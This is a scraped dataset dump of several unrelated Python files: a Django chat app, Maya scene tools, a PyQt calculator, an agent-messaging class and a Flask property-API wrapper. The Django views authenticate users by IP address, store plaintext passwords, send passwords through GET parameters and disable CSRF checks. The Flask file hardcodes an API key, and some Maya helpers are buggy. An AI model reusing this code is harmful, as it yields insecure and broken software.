'shipping': {\n 'address': {\n 'id': self.env.ref('shopinvader.partner_1_address_2').id\n }\n },\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.poste_carrier.id)\n\n def test_add_item_without_cart_should_work(self):\n with self.work_on_services(\n partner=None,\n shopinvader_session={}) as work:\n service = work.component(usage='cart')\n response = service.dispatch('add_item', params={\n 'product_id': self.env.ref('product.product_product_4b').id,\n 'item_qty': 1,\n })\n self.assertEqual(response['data']['lines']['count'], 1)\n","sub_path":"shopinvader_delivery_carrier/tests/test_carrier.py","file_name":"test_carrier.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645527166","text":"import sys\nfrom functools import partial\nfrom PyQt5.QtWidgets import *\n\nfrom model import evaluateExpression\nfrom view import PyCalcUi\n\n\nclass PyCalcCtrl:\n def __init__(self, view, model):\n self._evalute = model\n self._view = view\n self._connectSignals()\n\n def _calculateResult(self):\n res = self._evalute(expression=self._view.displayText())\n self._view.setDisplayText(res)\n\n def _buildExpression(self, sub_exp):\n if self._view.displayText() == \"Error\":\n self._view.clearDisplay()\n\n expression = self._view.displayText() + sub_exp\n self._view.setDisplayText(expression)\n\n def _connectSignals(self):\n for btnText, btn in self._view.buttons.items():\n if btnText not in {'=', 'C'}:\n btn.clicked.connect(partial(self._buildExpression, btnText))\n\n self._view.buttons['C'].clicked.connect(self._view.clearDisplay)\n self._view.buttons['='].clicked.connect(self._calculateResult)\n # self._view.display.returnPressed.connect(self._calculateResult)\n\ndef main():\n pycalc = QApplication([])\n view = PyCalcUi()\n view.show()\n\n model = evaluateExpression\n\n PyCalcCtrl(view=view, model=model)\n sys.exit(pycalc.exec_())\n\nif __name__ == '__main__':\n main()","sub_path":"zref/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"288699655","text":"import maya.cmds as cmds\r\nimport random\r\n\r\n\r\nclass ToolKit:\r\n def __init__(self):\r\n pass\r\n\r\n def value_check(self, values):\r\n \"\"\"\r\n Checks values to ensure all values are of type float or int\r\n input: list\r\n return: list of only int or float values\r\n \"\"\"\r\n result = list()\r\n for val in values:\r\n if type(val) == int or type(val) == float:\r\n result.append(val)\r\n return result\r\n\r\n def add(self, values):\r\n \"\"\"\r\n Adds list of numbers and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n result = 0\r\n current = self.value_check(values)\r\n for val in current:\r\n result += val\r\n print(str(values) + ' adds up to ' + str(result))\r\n return result\r\n\r\n def subtract(self, values):\r\n \"\"\"\r\n Subtracts a list of numbers from the first number in the list and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in values[1:]:\r\n result -= val\r\n print(str(values[0]) + ' minus ' + str(values[1:]) + ' is ' + str(result))\r\n return result\r\n\r\n def multiply(self, values):\r\n \"\"\"\r\n Multiplies a list of numbers and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in current:\r\n result *= val\r\n print(str(values) + ' multiplies up to ' + str(result))\r\n return result\r\n\r\n def divide(self, values):\r\n \"\"\"\r\n Subtracts a list of numbers from the first number in the list and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in values[1:]:\r\n if val != 0:\r\n result /= val\r\n else:\r\n print('Error: Divide by zero')\r\n print(str(values[0]) + ' divided by ' + str(values[1:]) + ' is ' + str(result))\r\n return result\r\n\r\n def power(self, values):\r\n \"\"\"\r\n Raises the value of 'values[0]' to the power of 'values[1]'\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n import math\r\n current = self.value_check(values)\r\n if len(current) >= 2:\r\n result = math.pow(current[0], current[1])\r\n print(str(current[0]) + ' to the power of ' + str(current[1]) + ' is ' + str(result))\r\n return result\r\n else:\r\n print('Error: Not enough valid float/int values in list')\r\n return 0\r\n\r\n def mean(self, values):\r\n \"\"\"\r\n Finds the mean of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = self.add(current) / len(current)\r\n print('The mean of ' + str(values) + ' is ' + str(result))\r\n return result\r\n\r\n def median(self, values):\r\n \"\"\"\r\n Finds the median of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n import math\r\n current = self.value_check(values)\r\n current.sort()\r\n middle = int(math.floor(len(current) / 2))\r\n if len(current) % 2 == 0:\r\n result = (current[middle - 1] + current[middle]) / 2\r\n else:\r\n result = current[middle]\r\n print('The median of ' + str(current) + ' is ' + str(result))\r\n return result\r\n\r\n def mode(self, values):\r\n \"\"\"\r\n Finds the mode of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n count = 1\r\n mode_count = 1\r\n current.sort()\r\n number = current[0]\r\n result = number\r\n for val in current[1:]:\r\n if val == number:\r\n count += 1\r\n else:\r\n if count > mode_count:\r\n mode_count = count\r\n result = number\r\n count = 1\r\n number = val\r\n if mode_count == 1:\r\n print('All numbers in this list appear only once')\r\n return 0\r\n else:\r\n print('The mode is ' + str(result) + ' which appears ' + str(mode_count) + ' times')\r\n assert isinstance(result, object)\r\n return result\r\n\r\n def center_locator(self, give_individual_centers):\r\n \"\"\"\r\n Finds the median of a list of values\r\n input: boolean\r\n return: none\r\n \"\"\"\r\n sels = cmds.ls(sl=True)\r\n locators = list()\r\n min_x = list()\r\n min_y = list()\r\n min_z = list()\r\n max_x = list()\r\n max_y = list()\r\n max_z = list()\r\n total = [0, 0, 0]\r\n if give_individual_centers:\r\n for obj in sels:\r\n split_name = obj.split('.[]_:')\r\n new_name = ''\r\n for word in split_name:\r\n new_name += '%s_' % word\r\n new_name += 'Loc'\r\n bounding_box = cmds.xform(obj, query=True, ws=True, boundingBox=True)\r\n if obj(type='joint'):\r\n joint_translate = cmds.xform(obj, query=True, translation=True, worldSpace=True)\r\n joint_rotate = cmds.xform(obj, query=True, rotation=True, worldSpace=True)\r\n cmds.spaceLocator(name=new_name)\r\n cmds.xform(new_name, translation=joint_translate, worldSpace=True)\r\n cmds.xform(new_name, rotation=joint_rotate, worldSpace=True)\r\n else:\r\n x = (bounding_box[0] + bounding_box[3]) / 2\r\n y = (bounding_box[1] + bounding_box[4]) / 2\r\n z = (bounding_box[2] + bounding_box[5]) / 2\r\n cmds.spaceLocator(name=new_name)\r\n cmds.xform(new_name, worldSpace=True, translation=(x, y, z))\r\n current_rotation = cmds.xform(obj, worldSpace=True, rotation=True, query=True)\r\n rot_x = current_rotation[0]\r\n rot_y = current_rotation[1]\r\n rot_z = current_rotation[2]\r\n cmds.xform(new_name, worldSpace=True, rotation=(rot_x, rot_y, rot_z))\r\n locators.append(new_name)\r\n return locators\r\n else:\r\n for obj in sels:\r\n bounding_box = cmds.xform(obj, query=True, worldSpace=True, boundingBox=True)\r\n min_x.append(bounding_box[0])\r\n min_y.append(bounding_box[1])\r\n min_z.append(bounding_box[2])\r\n max_x.append(bounding_box[3])\r\n max_y.append(bounding_box[4])\r\n max_z.append(bounding_box[5])\r\n min_x.sort()\r\n min_y.sort()\r\n min_z.sort()\r\n max_x.sort()\r\n max_y.sort()\r\n max_z.sort()\r\n total[0] = (min_x[0] + max_x[len(max_x) - 1]) / 2\r\n total[1] = (min_y[0] + max_y[len(max_y) - 1]) / 2\r\n total[2] = (min_z[0] + max_z[len(max_z) - 1]) / 2\r\n cmds.spaceLocator(name='TrueCenter_Loc')\r\n cmds.xform('TrueCenter_Loc', worldSpace=True, translation=(total[0], total[1], total[2]))\r\n\r\n def color_changer(self, color):\r\n \"\"\"\r\n Changes color of object to specified color\r\n input: string (yellow, red, blue, green, purple, orange, black, or white)\r\n return: none\r\n \"\"\"\r\n this_color = {\r\n 'yellow': lambda: 16,\r\n 'red': lambda: 12,\r\n 'blue': lambda: 5,\r\n 'green': lambda: 13,\r\n 'purple': lambda: 7,\r\n 'orange': lambda: 11,\r\n 'black': lambda: 1,\r\n 'white': lambda: 15\r\n }.get(color, lambda: 6)()\r\n selection = cmds.ls(sl=True)\r\n shapes = cmds.listRelatives(selection, shapes=True, children=True)\r\n for shape in shapes:\r\n cmds.setAttr('%s.overrideEnabled' % shape, True)\r\n cmds.setAttr('%s.overrideColor' % shape, this_color)\r\n\r\n def random_spawner(self, amount, grow_flag, move_range, scale_lower, scale_upper):\r\n \"\"\"\r\n Randomly places duplicates of selected object around object\r\n input: int, boolean, float, float, float\r\n return: none\r\n \"\"\"\r\n spawn_num = 1\r\n selection = cmds.ls(sl=True)\r\n polygons = cmds.filterExpand(selection, sm=12)\r\n if len(polygons) > 1:\r\n poly = cmds.polyUnite(polygons)\r\n else:\r\n poly = polygons\r\n cmds.rename(poly[0], 'Spawn_' + str(spawn_num))\r\n polygons[0] = 'Spawn_' + str(spawn_num)\r\n cmds.DeleteHistory((polygons[0]))\r\n cmds.xform('Spawn_' + str(spawn_num), pivots=(0, 0, 0), ws=True)\r\n if grow_flag:\r\n i = 0\r\n while i < amount:\r\n polygon = cmds.duplicate('Spawn_' + str(spawn_num))\r\n cmds.rename(polygon[0], 'CurrentSpawn')\r\n current_position = cmds.xform('CurrentSpawn', ws=True, query=True, translation=True)\r\n move_adj_x = random.randrange(-1 * move_range, move_range)\r\n move_adj_z = random.randrange(-1 * move_range, move_range)\r\n x = current_position[0] + move_adj_x\r\n y = current_position[1]\r\n z = current_position[2] + move_adj_z\r\n scale_adj = random.randrange(scale_lower, scale_upper)\r\n cmds.scale(scale_adj, scale_adj, scale_adj, 'CurrentSpawn')\r\n cmds.move(x, y, z, 'CurrentSpawn')\r\n spawn_num += 1\r\n cmds.rename('CurrentSpawn', 'Spawn_' + str(spawn_num))\r\n polygons[len(polygons) - 1] = 'Spawn_' + str(spawn_num)\r\n i += 1\r\n else:\r\n i = 0\r\n while i < amount:\r\n polygon = cmds.duplicate('Spawn_' + str(spawn_num))\r\n cmds.rename(polygon[0], 'CurrentSpawn')\r\n x = random.randrange(-1 * move_range, move_range)\r\n z = random.randrange(-1 * move_range, move_range)\r\n scale_adj = random.randrange(scale_lower, scale_upper)\r\n cmds.scale(scale_adj, scale_adj, scale_adj, 'CurrentSpawn')\r\n cmds.move(x, 0, z, 'CurrentSpawn', ws=True)\r\n spawn_num += 1\r\n cmds.rename('CurrentSpawn', 'Spawn_' + str(spawn_num))\r\n polygons[len(polygons) - 1] = 'Spawn_' + str(spawn_num)\r\n i += 1\r\n\r\n cmds.group(polygons, name='Geometry')\r\n\r\n def sequential_renamer(self, name_format):\r\n \"\"\"\r\n Renames selected objects in sequential order\r\n input: string, with # signs in place of desired numbers\r\n return: none\r\n \"\"\"\r\n selection = cmds.ls(sl=True)\r\n polygons = cmds.filterExpand(selection, sm=12)\r\n arg_length = len(name_format)\r\n tokens = name_format.split('#')\r\n print(tokens)\r\n tokens_length = len(tokens[0]) + len(tokens[len(tokens) - 1])\r\n num_length = arg_length - tokens_length\r\n\r\n i = 0\r\n while i < len(polygons):\r\n zero_string = ''\r\n loop_number = i + 1\r\n current_zeros = num_length - len(str(loop_number))\r\n j = 0\r\n while j < current_zeros:\r\n zero_string += '0'\r\n j += 1\r\n current_number = zero_string + str(loop_number)\r\n current_name = tokens[0] + current_number + tokens[len(tokens) - 1]\r\n cmds.rename(polygons[i], current_name)\r\n i += 1\r\n\r\n def control_maker(self, color):\r\n \"\"\"\r\n Creates control circle on selected objects\r\n input: string (yellow, red, blue, green, purple, orange, black, or white)\r\n return: none\r\n \"\"\"\r\n objects = center_locator(True, True)\r\n for obj in objects:\r\n split_name = obj.split('_')\r\n split_name.pop(len(split_name) - 1)\r\n new_name = ''\r\n for word in split_name:\r\n new_name += '%s_' % word\r\n new_name += '_Ctrl'\r\n grp_name = '%s_Grp' % new_name\r\n cmds.circle(name=new_name)\r\n color_changer(color)\r\n position = cmds.xform(obj, q=True, ws=True, rp=True)\r\n cmds.xform(new_name, ws=True, t=position)\r\n cmds.group(empty=True, name=grp_name)\r\n cmds.parent(new_name, grp_name)\r\n","sub_path":"OldScripts/Scripts/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"327004505","text":"# -*- coding:utf-8 -*-\n\nimport json\n\n\nclass SaleLayout(object):\n\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n ROBOT_LIBRARY_VERSION = '0.1'\n\n cabin_level = []\n cabin_detail = []\n\n\n def __init__(self):\n pass\n\n\n def clear_salelayout(self):\n self.cabin_level = []\n self.cabin_detail = []\n\n\n def create_salelayout(self, templatename, *param):\n\n '''\n 创建座位图:拼接座位图信息,传参时先传cabinLevel的信息,传完cabinLevel所有信息后,传一个空值,在robot里就是空一个格,再传cabinDetail信息\n :param 传参顺序为:templatename: 模板名称、cabinLevel【cabin->enlargeCount->enlargePercent】-cabinDetail【cabin->limitCount->cabinClassName->isNesting】\n '''\n\n saleLayout = {\"type\":\"createSaleLayout\",\n \"tempalteCode\": templatename}\n\n for i in range(len(param)-2):\n if param[i] == '':\n j = i\n h=0\n for k in range(0, j/3):\n cabinlevel = self.create_cabinLevel(*param[h:h+3])\n saleLayout[\"cabinLevel\"] = cabinlevel\n h+=3\n\n cabindetail = self.create_cabinDetail(*param[j+1:])\n saleLayout['cabinDetail'] = cabindetail\n return json.dumps(saleLayout)\n\n\n def create_cabinLevel(self, *param):\n j=0\n for i in range((len(param))/3):\n cabinlevel = {\"cabin\": param[j],\n \"enlargeCount\":param[j+1],\n \"enlargePercent\":param[j+2]}\n j+=3\n self.cabin_level.append(cabinlevel)\n return self.cabin_level\n\n\n def create_cabinDetail(self, *params):\n j=0\n for i in range((len(params))/4):\n cabindetail = {\"cabin\":params[j],\n \"limitCount\":params[j+1],\n \"cabinClassName\":params[j+2],\n \"isNesting\":params[j+3]}\n j+=4\n self.cabin_detail.append(cabindetail)\n return self.cabin_detail\n\n\n# s = SaleLayout()\n# print s.create_salelayout(\"temp\", \"F\", \"0\", \"10\", \"C\", \"0\", \"20\", \"\", \"F\", \"19\", \"Y3\", \"1\", \"F\", \"30\", \"A\", \"1\", \"C\", \"40\", \"U\", \"1\")\n# s.clear_salelayout()\n# print s.create_salelayout(\"temp\", \"F\", \"0\", \"10\", \"C\", \"0\", \"20\", \"\", \"F\", \"19\", \"Y3\", \"1\", \"F\", \"30\", \"A\", \"1\", \"C\", \"40\", \"U\", \"1\")\n","sub_path":"01Flight/SaleLayout.py","file_name":"SaleLayout.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"406290111","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This module contains the default message definition.\"\"\"\nfrom enum import Enum\nfrom typing import Optional, List, cast\n\nfrom aea.protocols.base import Message\nfrom aea.protocols.oef.models import Description, Query\n\n\nclass OEFMessage(Message):\n \"\"\"The OEF message class.\"\"\"\n\n protocol_id = \"oef\"\n\n class Type(Enum):\n \"\"\"OEF Message types.\"\"\"\n\n REGISTER_SERVICE = \"register_service\"\n REGISTER_AGENT = \"register_agent\"\n UNREGISTER_SERVICE = \"unregister_service\"\n UNREGISTER_AGENT = \"unregister_agent\"\n SEARCH_SERVICES = \"search_services\"\n SEARCH_AGENTS = \"search_agents\"\n OEF_ERROR = \"oef_error\"\n DIALOGUE_ERROR = \"dialogue_error\"\n SEARCH_RESULT = \"search_result\"\n\n def __str__(self):\n \"\"\"Get string representation.\"\"\"\n return self.value\n\n class OEFErrorOperation(Enum):\n \"\"\"Operation code for the OEF. It is returned in the OEF Error messages.\"\"\"\n\n REGISTER_SERVICE = 0\n UNREGISTER_SERVICE = 1\n SEARCH_SERVICES = 2\n SEARCH_SERVICES_WIDE = 3\n SEARCH_AGENTS = 4\n SEND_MESSAGE = 5\n REGISTER_AGENT = 6\n UNREGISTER_AGENT = 7\n\n OTHER = 10000\n\n def __str__(self):\n \"\"\"Get string representation.\"\"\"\n return str(self.value)\n\n def __init__(self, oef_type: Optional[Type] = None,\n **kwargs):\n \"\"\"\n Initialize.\n\n :param oef_type: the type of OEF message.\n \"\"\"\n super().__init__(type=oef_type, **kwargs)\n assert self.check_consistency(), \"OEFMessage initialization inconsistent.\"\n\n def check_consistency(self) -> bool:\n \"\"\"Check that the data is consistent.\"\"\"\n try:\n assert self.is_set(\"type\")\n oef_type = OEFMessage.Type(self.get(\"type\"))\n if oef_type == OEFMessage.Type.REGISTER_SERVICE:\n assert self.is_set(\"id\")\n assert self.is_set(\"service_description\")\n assert self.is_set(\"service_id\")\n service_description = self.get(\"service_description\")\n service_id = self.get(\"service_id\")\n assert isinstance(service_description, Description)\n assert isinstance(service_id, str)\n elif oef_type == OEFMessage.Type.REGISTER_AGENT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agent_description\")\n assert self.is_set(\"agent_id\")\n agent_description = self.get(\"agent_description\")\n agent_id = self.get(\"agent_id\")\n assert isinstance(agent_description, Description)\n assert isinstance(agent_id, str)\n elif oef_type == OEFMessage.Type.UNREGISTER_SERVICE:\n assert self.is_set(\"id\")\n assert self.is_set(\"service_description\")\n assert self.is_set(\"service_id\")\n service_description = self.get(\"service_description\")\n service_id = self.get(\"service_id\")\n assert isinstance(service_description, Description)\n assert isinstance(service_id, str)\n elif oef_type == OEFMessage.Type.UNREGISTER_AGENT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agent_description\")\n assert self.is_set(\"agent_id\")\n agent_description = self.get(\"agent_description\")\n agent_id = self.get(\"agent_id\")\n assert isinstance(agent_description, Description)\n assert isinstance(agent_id, str)\n elif oef_type == OEFMessage.Type.SEARCH_SERVICES:\n assert self.is_set(\"id\")\n assert self.is_set(\"query\")\n query = self.get(\"query\")\n assert isinstance(query, Query)\n elif oef_type == OEFMessage.Type.SEARCH_AGENTS:\n assert self.is_set(\"id\")\n assert self.is_set(\"query\")\n query = self.get(\"query\")\n assert isinstance(query, Query)\n elif oef_type == OEFMessage.Type.SEARCH_RESULT:\n assert self.is_set(\"id\")\n assert self.is_set(\"agents\")\n agents = cast(List[str], self.get(\"agents\"))\n assert type(agents) == list and all(type(a) == str for a in agents)\n elif oef_type == OEFMessage.Type.OEF_ERROR:\n assert self.is_set(\"id\")\n assert self.is_set(\"operation\")\n operation = self.get(\"operation\")\n assert operation in set(OEFMessage.OEFErrorOperation)\n elif oef_type == OEFMessage.Type.DIALOGUE_ERROR:\n assert self.is_set(\"id\")\n assert self.is_set(\"dialogue_id\")\n assert self.is_set(\"origin\")\n else:\n raise ValueError(\"Type not recognized.\")\n except (AssertionError, ValueError):\n return False\n\n return True\n","sub_path":"aea/protocols/oef/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"608584818","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect\nfrom .forms import SignUpForm, LoginForm, ChatIdForm\nfrom .models import ChatUser, Chat\nimport locale\nimport time\nfrom django.views.decorators.csrf import csrf_exempt\nfrom . import utils\nimport socket\nfrom .utils import get_ip\nfrom djangoChat.settings import STATIC_URL\nfrom django.utils import timezone\n\n# Create your views here.\n\ndef home(request):\n usernametohtml = \"\"\n usernameBool = False\n ip, pc = get_ip(request)\n suForm = SignUpForm()\n if request.POST.get(\"name\"):\n for chatuser in ChatUser.objects.all():\n if chatuser.name == request.POST.get(\"name\"):\n return render(request, 'chat/index.html',\n {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'restart': False,\n 'errorSignUp': True})\n utils.user['name'] = request.POST.get(\"name\")\n utils.user['password'] = request.POST.get(\"password\")\n utils.user['email'] = request.POST.get(\"email\")\n utils.user['dateOfBirth'] = request.POST.get(\"dateOfBirth\")\n utils.user['ip'] = \" \" + ip\n utils.user['lastPC'] = pc\n locale.setlocale(locale.LC_TIME, \"ru_RU\")\n date = time.strftime(\"%Y-%m-%d\")\n if not request.POST.get(\"dateOfBirth\"):\n utils.user['dateOfBirth'] = date\n a = ChatUser.objects.create(name=utils.user[\"name\"], email=utils.user[\"email\"], password=utils.user[\"password\"], dateOfBirth=utils.user['dateOfBirth'], ip=utils.user['ip'], lastPC=utils.user['lastPC'])\n a.save()\n return render(request, 'chat/index.html', {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'date': date, 'restart': True, })\n\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n if cIp == ip:\n utils.user['name'] = chatuser.name\n usernametohtml = chatuser.name\n usernameBool = True\n print(chatuser, chatuser.chat_set.all(), \" ll\")\n done = True\n\n if not done:\n utils.user = {}\n\n if request.GET.get(\"loginName\"):\n print(\"request.get()\")\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.name == request.GET.get(\"loginName\") and chatuser.password == request.GET.get(\"loginPassword\"):\n chatuser.ip = chatuser.ip + \" \" + ip\n chatuser.lastPC = socket.gethostname()\n chatuser.save()\n utils.user['name'] = request.GET.get(\"loginName\")\n utils.user['lastPC'] = socket.gethostname()\n print(chatuser.ip)\n done = True\n return HttpResponseRedirect('/home/')\n if not done:\n utils.user = {}\n return render(request, 'chat/index.html', {'formSignUp': SignUpForm, 'formLogin': LoginForm, 'ip': ip, 'restart': False, 'error': True})\n\n return render(request, 'chat/index.html', {'formSignUp': suForm, 'formLogin': LoginForm, 'ip': ip, 'username': usernametohtml, 'userBool': usernameBool})\n\n\n\ndef index(request):\n return HttpResponseRedirect(\"/home/\")\n\n\n@csrf_exempt\ndef chats(request):\n utils.allchats = []\n usersToLogout = []\n chatIdForm = ChatIdForm()\n ip, pc = get_ip(request)\n\n done=False\n for chatuser in ChatUser.objects.all():\n if request.GET.get(f\"check{chatuser.id}\"):\n usersToLogout.append(chatuser.id)\n done = True\n if done:\n print(usersToLogout)\n for userId in usersToLogout:\n logoutuser = ChatUser.objects.get(id=userId)\n if logoutuser.ip:\n for cIp in logoutuser.ip.split(\" \"):\n if cIp == ip:\n logoutuser.ip = logoutuser.ip.split(\" \")\n logoutuser.ip.remove(cIp)\n logoutuser.ip = ' '.join(logoutuser.ip)\n logoutuser.lastPC = ''\n logoutuser.save()\n return HttpResponseRedirect(\"/chats/\")\n\n\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip and chatuser.lastPC == pc:\n print()\n utils.user['name'] = chatuser.name\n print(chatuser, chatuser.chat_set.all())\n done = True\n for c in chatuser.chat_set.all():\n print(c)\n if c not in utils.allchats:\n utils.allchats.append(c)\n\n for cUser2 in ChatUser.objects.all():\n if cUser2.id != chatuser.id:\n print(\"-d\")\n if chatuser.lastPC == cUser2.lastPC and chatuser.lastPC and cUser2.lastPC:\n print('okokok')\n string = str(chatuser.lastPC)\n string += str(cUser2.lastPC)\n print(chatuser, cUser2)\n usersWithOnePc = []\n\n for u in ChatUser.objects.all():\n for j in ChatUser.objects.all():\n if u != j:\n if u.lastPC == j.lastPC and u.lastPC and j.lastPC:\n if u not in usersWithOnePc:\n usersWithOnePc.append(u)\n if j not in usersWithOnePc:\n usersWithOnePc.append(j)\n\n return render(request, 'chat/LogOut.html', {'cUser2': cUser2, 'chatuser': chatuser, 'UWOP': usersWithOnePc})\n\n else:\n print(1111111)\n\n\n if not done:\n return HttpResponse(\"

Sign up or login please


Go Home page
\")\n\n for c in Chat.objects.all():\n for member in c.members.split(\" \"):\n if member == utils.user['name']:\n print(member)\n for j in Chat.objects.filter(id=c.id):\n if j not in utils.allchats:\n utils.allchats.append(j)\n\n if request.POST.get(\"chatId\"):\n chat = Chat.objects.get(id = request.POST.get(\"chatId\"))\n if chat:\n chat.members += \" \" + str(utils.user['name'])\n chat.save()\n return HttpResponseRedirect(\"/chats/\")\n\n utils.allchats.sort(key=lambda x: x.lastMessageTime, reverse=True)\n return render(request, 'chat/chats.html', {'chats': utils.allchats, 'chatIdForm': chatIdForm, 'username': utils.user['name'], 'userBool': True})\n\n\n\n\ndef chatView(request, chat_id):\n pc = socket.gethostname()\n ip, pc = get_ip(request)\n try:\n a = Chat.objects.get(id=chat_id)\n except:\n return HttpResponse(\"404 Errror\")\n\n done = False\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip and chatuser.lastPC == pc:\n print()\n utils.user['name'] = chatuser.name\n print(chatuser, chatuser.chat_set.all())\n done = True\n\n if request.is_ajax():\n data = {\n 'author_name': request.POST.get('author_name'),\n 'messageText': request.POST.get('messageText'),\n }\n locale.setlocale(locale.LC_TIME, \"ru_RU\")\n data['pub_date'] = time.strftime(\"%d %B %Y г. %H:%M\")\n\n a.message_set.create(author_name=data['author_name'],messageText=data['messageText'],pub_date=timezone.now())\n a.save()\n\n return JsonResponse(data)\n\n chat = Chat.objects.get(id=chat_id)\n messages_set = chat.message_set.order_by('pub_date')\n messages = []\n for m in messages_set:\n if m.author_name == utils.user['name']:\n messages.append({\n 'author_name': m.author_name,\n 'messageText': m.messageText,\n 'pub_date': m.pub_date,\n 'sender': 'me'\n })\n else:\n messages.append({\n 'author_name': m.author_name,\n 'messageText': m.messageText,\n 'pub_date': m.pub_date,\n 'sender': 'you'\n })\n return render(request, 'chat/chat.html', {'chatId': chat_id, 'messages': messages, 'username':utils.user['name'], 'static': STATIC_URL})\n\n\n\n\ndef logout(request):\n ip, pc = get_ip(request)\n for chatuser in ChatUser.objects.all():\n if chatuser.ip:\n for cIp in chatuser.ip.split(' '):\n print(f'{ip}-{cIp}')\n if cIp == ip:\n print(\"=============\")\n chatuser.ip = chatuser.ip.split(' ')\n chatuser.ip.remove(cIp)\n chatuser.ip = ' '.join(chatuser.ip)\n print(chatuser.ip.split(' '))\n print(chatuser.ip)\n chatuser.lastPC = ''\n chatuser.save()\n return HttpResponseRedirect(\"/home/\")\n\ndef changePassword(request):\n pass\n\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471051631","text":"from flask import Flask, request\nfrom flask_restplus import Resource, Api, fields\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport requests, datetime, re\nimport operator, functools\nimport urllib.request\nimport json\n\napp = Flask(__name__)\napp.config.SWAGGER_UI_DOC_EXPANSION = 'list'\napi = Api(app,\n title = \"Assignment 2 - Harris Phan's Section - Properties\")\n \nsuburb_model = api.model('suburb', {\n 'suburb': fields.String(),\n})\n\nsuburb_model = api.model('suburb', {\n 'suburb': fields.Integer(),\n})\n\nparams = {\n 'api_key': 'key_2ea69bf3540b176b4b95eb87e6e97d67',\n}\n\ndef AddressLocator(suburb):\n url_endpoint = 'https://api.domain.com.au/v1/addressLocators?searchLevel=Suburb&suburb='f'{suburb}&state=NSW'.format(suburb=suburb)\n return url_endpoint\n \ndef PropertyPrices(suburbId):\n url_endpoint = 'https://api.domain.com.au/v1/suburbPerformanceStatistics?state=nsw&suburbId='f'{suburbId}&propertyCategory=house&chronologicalSpan=12&tPlusFrom=1&tPlusTo=3&values=HighestSoldPrice%2CLowestSoldPrice'.format(suburbId=suburbId)\n return url_endpoint\n\n@api.route('/addressLocators')\nclass Suburb(Resource):\n @api.doc(description = \"Get Suburb IDs\")\n @api.response(200, 'Successful retrieval')\n @api.response(201, 'Successful creation')\n @api.response(400, 'Unable to retrieve or create')\n @api.expect(suburb_model)\n def post(self):\n suburb = request.json['suburb']\n if ' ' in suburb == True:\n suburb_name = suburb.replace(' ', '%20')\n suburb_name = suburb_name.strip()\n response = requests.get(AddressLocator(suburb),params=params).json()[0]\n \n data_collection = {\n #\"suburb\": str(response['addressComponents'][0]['shortName']),\n \"suburb\": response['addressComponents'][0]['shortName'],\n \"suburb_id\": response['ids'][0]['id']\n }\n \n return data_collection\n\n#@api.route('/suburbPerformanceStatistics')\n#class HousePrices(Resource):\n# @api.doc(description = \"Get House prices for a suburb ID\")\n# @api.response(200, 'Successful retrieval')\n# @api.response(201, 'Successful creation')\n# @api.response(400, 'Unable to retrieve or create')\n# @api.expect(suburb_id)\n# def post(self):\n# suburb_id = request.json['suburb_id']\n \n \n\nif __name__ == '__main__':\n\n app.run(debug=True)\n\n\n ","sub_path":"tools/harris-api/domainAPI.py","file_name":"domainAPI.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"119658106","text":"from gettext import (\n gettext,\n ngettext,\n)\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Iterator,\n List,\n Set,\n)\n\nimport attr\n\nfrom .data import (\n Snapshot,\n SnapshotFossil,\n 